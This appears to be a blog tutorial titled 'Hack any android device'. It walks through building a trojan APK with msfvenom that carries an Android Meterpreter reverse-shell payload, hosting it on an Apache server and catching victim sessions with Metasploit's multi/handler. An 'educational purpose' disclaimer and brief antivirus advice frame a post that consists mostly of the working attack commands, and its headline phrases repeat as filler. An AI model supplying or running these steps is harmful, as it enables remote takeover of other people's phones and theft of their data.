Headlines
Loading...
How hackers attack your android | Hack any android device | Making virus Apk file | Hack android

How hackers attack your android | Hack any android device | Making virus Apk file | Hack android

Hack any android device, Making virus Apk file, Hack android
Hack android
This is not for any bad purpose. This is only for educational purpose. Don't use it for bad purpose.
First of all, open your Kali Linux in your Workstation.
After opening it, open the terminal of your Kali Linux.

After opening it
type
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168. LPORT=4444 R >shell.apk
After hitting Enter, it will generate an apk file.
Hack any android device, Making virus Apk file, Hack android

After that, open the Home page and copy that file from here and paste it to
computer/var/www/html
Hack any android device, Making virus Apk file, Hack androidHack any android device, Making virus Apk file, Hack android
 You can copy this apk file or send it to an android phone which you want to hack.
or
You can also download it by making an online server in below.
After it, open a new terminal it will make an online server
then,type
service apache2 start
service postgresql start
After that, you need to open the Metasploit Framework
then, type
msfconsole
Hack any android device, Making virus Apk file, Hack android

After opening the msf
type here
 use exploit/multi/handler
After that, you need to set payload
type
set payload android/meterpreter/reverse_tcp
After setting payload, set your LHOST
type
set LHOST "YOUR IP"
Then your LPORT
type
set LPORT 4444
After setting all that, you want to start it
then type
exploit
Hack any android device, Making virus Apk file, Hack android

 When someone download it to its android mobile, the meterpreter session has been started. When its start you write the command named 'Help' to show all commands.

So, you can see that how hackers attack your android phone.
You need to avoid from any app like that.
You need to use your phone antivirus program or other antivirus programs that are available on web.
If you found any suspicious activity with your phone, turn off your phone quickly.
It will saves you from hacker.

0 Comments:

Thanks for your comment.